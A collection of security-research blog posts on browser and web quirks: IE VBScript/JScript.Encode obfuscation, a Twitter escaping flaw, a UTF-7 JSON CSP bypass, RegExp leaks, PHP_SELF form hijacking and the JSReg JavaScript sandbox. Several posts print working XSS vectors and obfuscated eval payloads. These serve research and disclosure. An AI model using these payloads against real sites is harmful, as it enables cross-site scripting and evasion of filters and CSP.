Ping pong obfuscation

This is a fun post about a feature I found in IE that allows you to do some crazy obfuscation. I’ll start off with some simple examples:-

<img src=1 language=vbs onerror=msgbox+1>
<img src=1 language=vbscript onerror=msgbox+1>
<img src=1 onerror=vbs:msgbox+1>

So here we’re not obfuscating but I’m showing how IE accepts the language attribute and a labelled vbs statement to change the event to allow vbscript instead of javascript. Ok so lets play a little ping pong:-

execScript("MsgBox 1","vbscript"); //executes vbs from js
execScript('execScript "alert(1)","javascript"',"vbscript");

Look how we can call vbscript from javascript by using execScript and then look how we can execute from javascript to vbscript and then back to javascript again! So now we’re playing some ping pong but how can we make our little game hidden?

<a href=# language="JScript.Encode" onclick="#@~^CAAAAA==C^+.D`8#mgIAAA==^#~@">test</a>

Wait what? Yeah IE supports jscript.encode within the language attribute. Remember jscript.encode? ah the old ones are the best :) That’s it right? Well….

<iframe onload=VBScript.Encode:#@~^CAAAAA==\ko$K6,FoQIAAA==^#~@>

Yeah you can use VBScript.Encode and Javascript.Encode as labels within an event! You might be going WTF right now and I can understand it because I did exactly the same but it would be silly to finish now without finishing our game of ping pong. How many rallies shall I do? I think 3 should be enough….

<body onload="&#x6a;&#x73;&#x63;&#x72;&#x69;&#x70;&#x74;&#x2e;&#x65;&#x6e;&#x63;&#x6f;&#x64;&#x65;&#x3a;&#x23;&#x40;&#x7e;&#x5e;&#x54;&#x41;&#x41;&#x41;&#x41;&#x41;&#x3d;&#x3d;&#x6e;&#x58;&#x2b;&#x5e;&#x55;&#x6d;&#x4d;&#x6b;&#x77;&#x44;&#x60;&#x72;&#x3a;&#x40;&#x24;&#x3f;&#x37;&#x33;&#x68;&#x7a;&#x62;&#x29;&#x29;&#x7b;&#x27;&#x5a;&#x25;&#x51;&#x52;&#x47;&#x3d;&#x32;&#x9;&#x56;&#x37;&#x57;&#x42;&#x20;&#x71;&#x64;&#x47;&#x5c;&#x3a;&#x32;&#x6a;&#x62;&#x65;&#x62;&#x7a;&#x29;&#x27;&#x7b;&#x37;&#x3a;&#x3d;&#x40;&#x24;&#x4a;&#x7e;&#x45;&#x25;&#x6b;&#x6d;&#x2e;&#x6b;&#x61;&#x4f;&#x63;&#x2b;&#x55;&#x31;&#x57;&#x39;&#x2b;&#x4a;&#x2a;&#x43;&#x52;&#x63;&#x41;&#x41;&#x41;&#x3d;&#x3d;&#x5e;&#x23;&#x7e;&#x40;">

Ok so I go to:-
jscript->jscript.encode->jscript.encode->jscript.encode->hex entities

Twitter misidentifying context

This is an important post for me, not because it’s ground breaking but people don’t seem to get this when using data in certain context. If you are a dev please read this and read it until you understand it because if you misidentify context you fail and you fail pretty badly.

I reported this to twitter about two months ago, they responded and fixed four xss holes but two remain and they didn’t contact me to test the fix.

When you are including user input inside a javascript event within a string what do you have to escape? If you answered: ‘”<>\
You are wrong. Twitter is wrong.

Take the following example:-

<a href=# onclick="x= 'USERINPUT' ">test</a>

So you can place your input within the single quotes and there is a place on twitter that does this:-
twitterTheseResults(’ \&quot;\’xss’,'/search?q=&a…

Here they are escaping &quot; with \&quot; and ‘ with \’. But that isn’t enough! Why? Because it’s a javascript onclick event! Inside an event you have to escape entities! All of them!

Consider the following vector:-
&apos;,alert(1),&apos;

No single quotes but &apos; still acts as one. Please look at this test and make sure you understand how it works:-
http://tinyurl.com/xssyoda

Don’t forget other entities work too &#39; &#x27; &#39 &#x27 so make sure you escape all characters within a js event like so:-

<a href="#" onclick="x='USERINPUT\x27\x22\x3c\x3e'">test</a>

and Twitter PLEASE fix this and related holes c’mon it’s been two months, it’s not rocket science to fix.

&apos; works on non-IE browsers but the other entities mentioned work fine on IE too.

Bypassing CSP for fun, no profit

I had fun at Confidence 2.0 CON, I’m gonna blog about the stuff I was holding back now :)

So I figured how to bypass CSP with UTF-7 and JSON. Basically any site with a JSON feed that can be manipulated by an attacker (reflective or persistent) can be injected with even in a correctly escaped JSON feed.

Utf-7 can be fully encoded meaning that you can conceal string characters and others. ‘ABC’ becomes +ACcAQQBCAEMAJw-. So if we look at a fictional JSON feed such as:-
[{'friend':'something',email:'something'} ]

If we can influence the “something” parts then we inject the feed with our data to bypass CSP:-
[{'friend':'luke','email':'+ACcAfQBdADsAYQBsAGUAcgB0ACgAJw
BNAGEAeQAgAHQAaABlACAAZgBvAHIAYwBlACAAYgBlACAAdw
BpAHQAaAAgAHkAbwB1ACcAKQA7AFsAewAnAGoAb
wBiACcAOgAnAGQAbwBuAGU-'}]

This is what the code looks like when decoded:-
[{'friend':'luke','email':''}];alert(’May the force be with you’);[{'job':'done'}]

We then inject the data by referencing it using a script tag and a charset:-

"><script src="http://some.website/test.json" charset="utf-7"></script>

This successfully executes in CSP bypasing it’s restrictions because the code comes from the domain itself and doesn’t use in-line or attribute based XSS.

As always as demo is available here:-
CSP bypass

My RegExp is leaking

I discovered a long time ago that the Javascript specification actually encourages the global RegExp object to retain the properties from the last execution of the regular expression parser. This is quite funny and stupid because as we move forward and sites start to share the same Javascript space we will leak information that we don’t want to leak.

Don’t get me wrong this isn’t a huge issue, it’s just one of those little spec holes which we can exploit for Obfuscation or information leakage. Noscript or Firefox I’m not sure which seems to leak the last RegExp execution when called from a event. An example of this can be viewed here:-

Regexp leak

So when you click the link, the URL is actually built from Noscripts scan of the URL using the following code:-

alert(RegExp['$`']+RegExp['$&']+RegExp['$\''])

This could be used for hiding a XSS payload or something, like I said not really that serious…okay onto obfuscation. We can use leftContext etc as a variable to eval and execute code based on the RegExp matches like so:-

/\\u0024/.test('\x61\x6c\x65\x72\x74\x28\x31\x29\x24');
eval(RegExp['$`'])

So the pattern finds \$ within the text alert(1)$ and returns the leftContext (RegExp['$`']) which is alert(1) and executes the code.

And finally I’ll leave you with some bonus obfuscation:-

eval('a'.replace(/(.+)/,'$1l').replace(/(.+)/,'$1e').replace(/(.+)/,'$1r').replace(/(.+)/,'$1t').replace(/(.+)/,'$1(').replace(/(.+)/,'$11').replace(/(.+)/,'$1)'))
eval('342342ale'.replace(/\d+/,'$`')+'rt23879'.replace(/\d+/,'$\'')+'abcdefggi(1)'.replace(/.+(\([1]\))/,'$+'))

PHP self return of the slash

Not posted for a while because I couldn’t think of anything interesting to say but I thought about something I found ages ago in PHP4 and it’s been long enough now. This is also quite funny because my server is vulnerable to this (that’s what I get for crappy hosting).

So what happens if you escape PHP_SELF with htmlentities($_SERVER['PHP_SELF'], ENT_QUOTES)? Safe from XSS? I hope so. Safe from everything? Well not really or at least it didn’t used to be. You see PHP does some crazy things with the URL and it’s possible to change a form target to an external URL without using any unsafe characters. Take the following example:-

Login form

This form simulates some web application login and uses PHP_SELF to output the URL because for some reason the developer doesn’t want to type “login.php” or use __FILE___. The URL is escaped from XSS but we can change the form target by simply supplying slashes :) e.g.

Sending Google your password So the user enters their username and password combination and thinks that they are logging on to the target application in reality you are sending the details to a evil site.

I checked PHP5 and it seemed ok but this will serve as a reminder that the slash can get you.

Javascript compression with unicode characters

For some random reason I was making a base999 number compression function, I think it was because someone posted on sla.ckers about base 62. I wanted to see how far I could compress the numbers using a higher range of characters, then it hit me. Why not use it for js compression :)

You see if you convert the characters to their character code number and then extract a section of the number and convert it to a unicode character you can drastically reduce the amount of characters, provided of course your code contains enough characters as a decompression function is required.

I’ve added the three tag to Hackvertor to demo the compression. Here is a sample of code:-

eval("◮ᾥѵ٨ፍ".replace(/[^\s]/g,function(c){return c.charCodeAt()}).replace(/[3][2-9]|[4-9][0-9]|[1][0-1][0-9]|[1][2][0-6]/g,function(d){return String.fromCharCode(d)}))

The unpacking function simply gets the character codes, then the very specific regexp finds a range of characters from !-~ based on the character code number. This is because I only have one long number and they are not separated. I leave spaces intact because they don’t fall between the ranges and also it can break syntax if they are missing a semi-colon. It’s possible to reduce it further by including these characters.

So if you want to have some fun, try reducing the amount of characters compressed and see if you can create a smaller decompression function. Below is an example of the jspack tag in action:-
JS pack

Update…

Ok as Andrea pointed out this isn’t actual compression however many systems including twitter think the unicode characters are actually only 1 byte which results in longer message. So you can compress a 280 character message into 140. Sirdarckcat manage to get it down to the 50% ratio, you can send encoded twitter messages with Hackvertor. Like this:-

Encoded twitter message

Fresh prototypes on all browsers

So there’s a well known technique for getting Object prototypes that are not from the current window which results in a fresh prototype. You use iframes to copy the required prototype from the iframe.contentWindow BUT…It doesn’t work in all browsers and it’s pretty silly having to copy each object manually, why not just use the window? Well you can :D

So after a lot of code testing/rewriting here is how to do it:-

var iframe = document.createElement('iframe');
iframe.style.width = '1px';
iframe.style.height = '1px';
iframe.frameborder = "0";
iframe.style.position = 'absolute';
iframe.style.left = '-100px';
iframe.style.top = '-100px';
document.body.appendChild(iframe);
var code = "(function(objConstructor){ return window.NameOfInstance= objConstructor();})(" + objConstructor+ ")";
if (window.opera) {
	iframe.contentWindow.Function(code)();
} else {
	iframe.contentWindow.document.write('<\script type="text/javascript">' + code + '<\/script>');
	iframe.contentWindow.document.close();
}
var obj = iframe.contentWindow.NameOfInstance;
if(!obj) {
	iframe.contentWindow.Function(code)();
	obj = iframe.contentWindow.NameOfInstance;
}

So here obj contains our Object instance within the context of the iframe window, that means any references to window inside your object only affect the iframe context. The reason for the if statements and different code is because Firefox, Safari, Opera and IE all act differently. Opera doesn’t pass the object straight away unless the Function constructor is used, Safari supports the Function constructor method and the document.write method but doesn’t return the object correctly when using document.write until it’s loaded.

The important part about this code is that you don’t need to use the onload event of the iframe as the object is returned instantly :)

Creating HTML listeners with JSReg and Hackvertor

JSReg has grown up a bit since I released the first version. You can now use it to monitor malicious javascript. I have a very basic example of this in Hackvertor, at the moment Hackvertor doesn’t support callbacks so it’s a bit of a hack but you will get the idea.

I use __defineSetter__ to monitor the fake document object, you see in JSReg the document object doesn’t exist it becomes $document$ but you can supply your own object in order to create a listener. At the moment the code only works on Firefox, see below for the example:-

var parser = JSReg();
var result;
parser.setDebugObjects({result: function(code){
						result = code;
						}});
var html = '';
if (window.__defineSetter__) {
	var htmlLog = function(str) {
		html += str;
	}
	var obj = {
		$write$:htmlLog,
		$body$:htmlLog
	}
	obj.$body$.__defineSetter__('$innerHTML$',htmlLog);
	obj.__defineSetter__('$innerHTML$',htmlLog);
	parser.setDocument(obj);
}
try {
	parser.runCheck();
	parser.eval(code);
}
catch (e) {
	alert(e.description||e);
}
alert('Decoding javascript...');
if(html != '') {
	result += '\nHTML:'+html;
}
return result;

So “obj” is our fake document object, I just add the properties write and body. Then I use __defineSetter__ to monitor any assignments to innerHTML. You could monitor more of course and even extend the window object to monitor eval. So how does this work in practice? Well take a look below with some fake encoded malicious javascript:-

Encoded fake javascript malware

As you can see JSReg executes the javascript safely and then uses the fake document to monitor document.write which presents you with the HTML output. This is only a basic example of how it could be used, in future I plan to allow Hackvertor to provide more detailed examination of malicious javascript.

JSReg update

Big thanks!

I’ve done lots of updates to JSReg with some fantastic help from kangax, sirdarckcat, Thornmaker and mario.

Mario found some cool parsing bugs, sirdarckcat helped with some exploits that assigned to window :) and also provided some awesome code ideas and bugs. Thornmaker found ternarys cause problems with my object detection. I’d also like to thank Achim who helped me find a recursive regexp when he tested it on other browsers. Finally kangax’s input has been great providing me with some headaches trying to match RegExps that look like comments and many other parsing bugs. Thanks a lot guys! You’ve been awesome!

A lot has changed since my last post, it’s getting closer and closer to be used in real world applications and my new version of Hackvertor :) I didn’t expect to be able to parse as much code as it currently does and manage to keep the RegExps small. I try to match as little as possible as Javascript is a complex language.

How it works

In case you don’t know, JSReg is a Javascript sandbox with a difference. It uses Javascript itself to safely parse the code using regular expressions. This means that some features are removed from the Javascript language while in the sandbox, examples of these are access to the DOM like document.body etc. and Object methods like valueOf and toString. The goal is to produce safe Javascript from a untrusted source.

To see how it works check the following example:-

a='a';eval(\u0061+'\x6c\x65\x72\x74\x28\u0034\x32\u0029');

The code assigns the letter “a” to a variable of “a”. Then the eval function is used with a unicode escape which translates to the variable “a” then it’s concatenated with various escapes to produce alert(42).

Here is the JSReg’d version:-

var $a$,$eval$;
$a$=globals.string('a');$eval$($a$+globals.string('\x6c\x65\x72\x74\x28\u0034\x32\u0029'));

So the rewriter identifies dangerous strings and converts them into safe strings. In this instance eval is renamed $eval$ which is a custom JSReg function that translates the content sent to it. All variables used are declared at the top which prevents them being assigned to the global window space. globals.string etc are a special JSReg object which defines a new prototyped version of String etc. to allow you to call whitelisted methods of the object.

Interface

That’s the basic idea of how JSReg works, the interface contains six textareas which shows the result of the JSReg evaluation. The first box is your code input, second is the JSReg conversion of your input, globals.eval contains the result of an eval operation and the code which has been rewritten, globals.function contains a similar output to eval but with Function code when calling new Function, the result returns the evaluated result after the code has been converted and the globals box at the bottom lists any global variables that might have escaped the sandbox.

Future and development

I always thought it was possible to use untrusted Javascript within Javascript itself, many other solutions had other languages as a requirement. I think JSReg is definitely getting there now after many of failed attempts. I plan to integrate sirdarckcat’s HTML parser too in future, to allow safe access to the DOM. Best of all I’m giving away this code, you can use it freely on your web site :) So please get involved! Find a exploit or a parsing error and help produce a native Javascript sandbox which is free for everybody to use.

Try out JSReg

Hidden Firefox properties revisited

This is the first time I’ve looked at the Firefox source, really! :) I wanted to find all the hidden properties Firefox has in Javascript. It was first pointed out to me by DoctorDan on the slackers forums when he found that the RegExp literal had a -1 value for the source in Firefox 2. I then made it my mission to find others because I thought it would be cool.

They seem to be flags within the source (Ronald mentioned this to me at some point too), I’m not sure how they are used internally or within Javascript. In the source code they are given the name tinyid so that’s what I’ll refer to them from now on.

Here’s how to use them:-

(function(){ alert(arguments[-3]) })()

Functions:-
CALL_ARGUMENTS = -1, predefined arguments local variable
ARGS_LENGTH = -2, number of actual args, arity if inactive
ARGS_CALLEE = -3, reference from arguments to active funobj
FUN_ARITY = -4, number of formal parameters; desired argc
FUN_NAME = -5, function name, “” if anonymous
FUN_CALLER = -6 Function.prototype.caller, backward compat

RegExp:-
REGEXP_STATIC_INPUT = -1,
REGEXP_STATIC_MULTILINE = -2,
REGEXP_STATIC_LAST_MATCH = -3,
REGEXP_STATIC_LAST_PAREN = -4,
REGEXP_STATIC_LEFT_CONTEXT = -5,
REGEXP_STATIC_RIGHT_CONTEXT = -6

REGEXP_SOURCE = -1,
REGEXP_GLOBAL = -2,
REGEXP_IGNORE_CASE = -3,
REGEXP_LAST_INDEX = -4,
REGEXP_MULTILINE = -5,
REGEXP_STICKY = -6;

E4X:-
NAMESPACE_PREFIX = -1,
NAMESPACE_URI = -2

QNAME:-
QNAME_URI = -1,
QNAME_LOCALNAME = -2

As I find more I’ll add them here, I know strings uses -1 for the length but I’ll wait till I find all of them for the string object.